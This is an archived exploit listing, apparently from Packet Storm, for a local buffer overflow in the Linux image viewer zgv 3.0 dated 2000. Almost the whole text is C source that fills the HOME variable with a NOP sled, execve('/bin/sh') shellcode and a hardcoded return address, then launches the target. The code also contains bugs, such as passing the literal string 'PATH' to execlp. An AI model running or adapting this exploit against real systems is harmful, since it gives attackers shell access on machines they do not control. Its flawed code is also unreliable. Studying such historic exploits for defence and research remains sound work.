Zgv 3.0 local exploit for Linux.
97a09fdb60023de0734f695a952ce7ceec2f4651602772ae2bbd81286136ebe7/*
zgv 3.0 local linux sample exploit
by slash / buffer0verfl0w security
<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>
Initial exploit version by Mixter <mixter@newyorkoffice.com>
*/
#include <stdio.h>
#include <stdlib.h>
#define NOPS 0x90 // No operation instruction
#define BUFLEN 1032 // Our buffer size
#define RETADDR 0xbffff574 // Change this if it doesn't suit Youre needs
#define PATH "/usr/bin/zgv" // Path to the program
char shellcode[]= // execve("/bin/sh");
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main()
{
char buf[BUFLEN];
long retaddr = RETADDR;
int i;
printf("######################################\n");
printf("# zgv 3.0 local linux sample exploit #\n");
printf("# by slash / buffer0verfl0w security #\n");
printf("######################################\n");
printf("# Using return address 0x%lx\n",retaddr);
printf("# Using buffer size %d\n", strlen(buf));
// Build the overflow string.
for (i = 0; i < BUFLEN; i += 4)
*(long *) &buf[i] = retaddr;
// Copy the NOPS in to the buffer leaving space for
// the shellcode.
memset(buf, NOPS, BUFLEN - strlen(shellcode) - 100);
// Copy the shellcode into the buffer.
memcpy(buf + (BUFLEN - strlen(shellcode) - 100), shellcode, strlen(shellcode));
setenv("HOME", buf, 1);
// Execute the program
execlp("PATH", "zgv", 0);
return 0;
}
/* www.hack.co.za [5 September 2000]*/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed